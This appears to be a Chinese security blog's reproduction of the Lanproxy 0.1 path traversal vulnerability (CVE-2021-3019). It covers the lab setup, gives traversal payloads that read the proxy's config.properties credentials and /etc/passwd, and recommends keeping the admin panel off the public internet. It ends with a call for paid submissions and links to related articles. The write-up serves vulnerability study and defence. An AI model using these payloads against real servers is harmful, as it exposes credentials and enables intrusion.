本文由粉丝:判官蜘蛛投稿
漏洞概述:
Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。
影响版本:
lanproxy 0.1
环境搭建:
1.下载proxy-server-0.1.zip
下载地址:https://file.nioee.com/d/2e81550ebdbd416c933f/2. 解压安装之后移动文件
mv proxy-server-0.1 /usr/local/直接启动服务
cd /usr/local/proxy-server-0.1/binchmod +x startup.sh./startup.sh3. 访问 :8090 登录界面窗口
4.漏洞利用
Poc/../conf/config.properties5.读取passwd
/../../../../../../../../../etc/passwd成功读取
6、修复建议
lanproxy尚未针对该漏洞发布安全更新
建议禁止将lanproxy管理面板对外部开放
结束语:
本次复现是本地搭建模拟攻击行为,本文章仅用于交流学习,请勿使用该漏洞进行违法活动。
【来稿说明】:
本宗旨是一个公益性的平台,属于大家锻炼的平台,不能只展示我个人的,所以欢迎有才华的人士来稿。大家写文档投稿,也需要占用一定的个人时间,且现在的生活节奏较快,能乐于分享,牺牲自己的宝贵时间,真的很难得。所以,小编决定根据个人经济情况及投稿文章质量,每次投稿,打赏的稿费定在5元-50元之间,请有兴趣者,不要介意钱太少,或者后续也可以采用赠送书籍的形式。来稿邮箱:@.com
来稿声明:须自己本人原创,否则后果自行承担。未在其他平台发布过。
END
猜您喜欢往期精选▼SQL注入详解,看这篇就够了
“来骗、来偷袭”攻击我这脆弱的“老”系统,不讲“武”德!
综合开源靶场搭建
SQL注入及如何解决
安全应急之常见命令篇(Linux&Windows)
更多精选资源尽在星球,欢迎加入交流